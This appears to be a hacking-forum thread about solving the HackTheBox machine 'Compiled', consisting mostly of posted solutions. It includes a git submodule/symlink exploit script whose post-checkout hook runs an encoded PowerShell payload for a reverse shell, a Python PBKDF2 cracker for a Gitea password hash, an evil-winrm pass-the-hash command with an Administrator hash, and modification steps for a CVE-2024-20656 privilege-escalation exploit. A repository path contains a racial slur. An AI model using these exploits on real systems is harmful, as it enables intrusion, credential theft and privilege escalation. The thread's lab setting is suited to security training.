[HTB] Compiled
by UnkownWombat - Saturday July 27, 2024 at 07:07 PM
#71
(07-29-2024, 10:58 AM)vegantiger Wrote:
(07-29-2024, 08:55 AM)fuliye Wrote:
(07-28-2024, 03:18 AM)fuckhackthebox Wrote: register and create empty repos on port 3000

#!/bin/bash git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main rm -rf repo1 rm -rf repo2 git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git cd repo1 mkdir -p y/hooks cat > y/hooks/post-checkout <<EOF #!bin/sh.exe PAYLOAD_HERE EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push cd .. git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo2.git cd repo2 git submodule add --name x/y "http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git" A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git push

adjust accordingly

both repos need to be clean/empty

if you fuck it up then delete the repos recreate them and try again

when i run this script wan done, i use git clone --recursive http://gitea.compiled.htb:3000/vvvvv/v1.git that not callback the shell

The service on port 5000 responds in approximately 20 seconds. Wait a moment.
use this;

#!/bin/bash git init hook cd hook mkdir -p y/hooks cat > y/hooks/post-checkout <<EOF #!/bin/bash powershell -e <base64> EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git remote add origin http://<machine-ip>:3000/qwe/hook.git git push -u origin main cd .. git init exploit cd exploit git submodule add --name x/y http://<machine-ip>:3000/qwe/hook.git A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git remote add origin http://<machine-ip>:3000/qwe/exploit.git git push -u origin main cd ..

thx bro , but what link to port 5000 ?
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#72
(07-29-2024, 10:07 PM)andy1 Wrote:
(07-28-2024, 09:23 AM)jsvensson Wrote: Sure:
import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',  # hashing algorithm
        password.encode('utf-8'),  # password
        salt,  # salt
        iterations,  # number of iterations
        dklen=dklen  # key length
    )
    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
   
    target_hash_bytes = binascii.unhexlify(target_hash)
   
   
    with open(dictionary_file, 'r', encoding='utf-8') as file:
        for line in file:
           
            password = line.strip()
           
            # generating hash
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
           
            # Check if hash is correct
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password
   
    print("Password not found.")
    return None

# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')  # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' # hash from gitea.db

# Patch to dictionary
dictionary_file = '/usr/share/wordlists/rockyou.txt'

find_matching_password(dictionary_file, target_hash, salt)

curious though how da fug did you figure out how to distinguish which part was the hash and which part was salt and how id you know it was in hex?

if you open gitea.db with sqlitebrowser it will show you what is what.
Reply
#73
(07-30-2024, 02:55 AM)fuliye Wrote:
(07-29-2024, 10:58 AM)vegantiger Wrote:
(07-29-2024, 08:55 AM)fuliye Wrote:
(07-28-2024, 03:18 AM)fuckhackthebox Wrote: register and create empty repos on port 3000

#!/bin/bash git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main rm -rf repo1 rm -rf repo2 git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git cd repo1 mkdir -p y/hooks cat > y/hooks/post-checkout <<EOF #!bin/sh.exe PAYLOAD_HERE EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push cd .. git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo2.git cd repo2 git submodule add --name x/y "http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git" A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git push

adjust accordingly

both repos need to be clean/empty

if you fuck it up then delete the repos recreate them and try again

when i run this script wan done, i use git clone --recursive http://gitea.compiled.htb:3000/vvvvv/v1.git that not callback the shell

The service on port 5000 responds in approximately 20 seconds. Wait a moment.
use this;

#!/bin/bash git init hook cd hook mkdir -p y/hooks cat > y/hooks/post-checkout <<EOF #!/bin/bash powershell -e <base64> EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git remote add origin http://<machine-ip>:3000/qwe/hook.git git push -u origin main cd .. git init exploit cd exploit git submodule add --name x/y http://<machine-ip>:3000/qwe/hook.git A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git remote add origin http://<machine-ip>:3000/qwe/exploit.git git push -u origin main cd ..

thx bro , but what link to port 5000 ?

You have to 'compile' the second repo with the compile app on port 5000
Reply
#74
Quote:curious though how da fug did you figure out how to distinguish which part was the hash and which part was salt and how id you know it was in hex?

A simpler script provived by ChatGPT, asking the chat bot makes life of an hacker simpler nowadays  Big Grin :

import base64 # Hexadecimal string hex_string = "97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16" # Convert hex to bytes byte_array = bytes.fromhex(hex_string) # Convert bytes to Base64 base64_encoded = base64.b64encode(byte_array) # Convert Base64 bytes to a string base64_string = base64_encoded.decode('utf-8') print(base64_string)

You can replace the hex string value by the hash you found in the db to get the convert version of salt.

Another easier method is CyberChef, use the recipes:
From Hex > To Base64
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#75
I'll leave this here and go slowly...

evil-winrm -i <ip of Compiled box> -u Administrator -H f75c95bc9312632edec46b607938061e
Reply
#76
(08-01-2024, 06:33 PM)oahofat Wrote: I'll leave this here and go slowly...

evil-winrm -i <ip of Compiled box> -u Administrator -H f75c95bc9312632edec46b607938061e

Thanks you save me !
Reply
#77
(07-29-2024, 12:13 PM)aasdawejkasjdkasd Wrote:
(07-28-2024, 10:44 PM)standby123 Wrote:
(07-28-2024, 01:51 PM)jsvensson Wrote: Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change  CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver  (why the hell it is stopped Big Grin)
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps Smile

Thanks man I was struggling with it but I after changing the server it works

What do you mean changing the serveR?

Can anyone help me root!? I'm having trouble understanding how to use CVE... because when trying to compile the code it gives the error: #include <windows.h> I can't do it if anyone can help I would be grateful
Ban reason: Leeching. (Permanent)
Reply
#78
i cant seem to get it working
Ban reason: Reposting hidden content for free (Permanent)
Reply
#79
(11-29-2024, 11:09 AM)redbaby Wrote: i cant seem to get it working

you should really specify what part you are working on Wink
Ban reason: Leeching. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,922 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,389 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,552 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,375 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,673 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: